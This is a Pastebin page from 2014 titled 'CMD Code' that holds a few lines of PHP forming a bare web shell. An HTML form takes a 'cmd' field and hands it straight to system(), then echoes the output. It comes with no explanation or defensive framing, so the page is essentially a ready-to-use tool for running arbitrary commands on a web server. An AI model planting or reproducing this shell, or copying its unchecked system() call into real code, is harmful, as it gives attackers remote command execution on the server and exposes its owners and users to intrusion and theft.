3x5w4rup

CMD Code

Jun 2nd, 2014
518
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.16 KB | None | 0 0
  1. <form method="POST">
  2. <input type="text" name="cmd">
  3. <input type="submit" value="Run">
  4. <pre>
  5. <?
  6. $cmd = $_POST['cmd'];
  7. $dk = system($cmd);
  8.  
  9. echo "$dk";
  10. ?>
Add Comment
Please, Sign In to add comment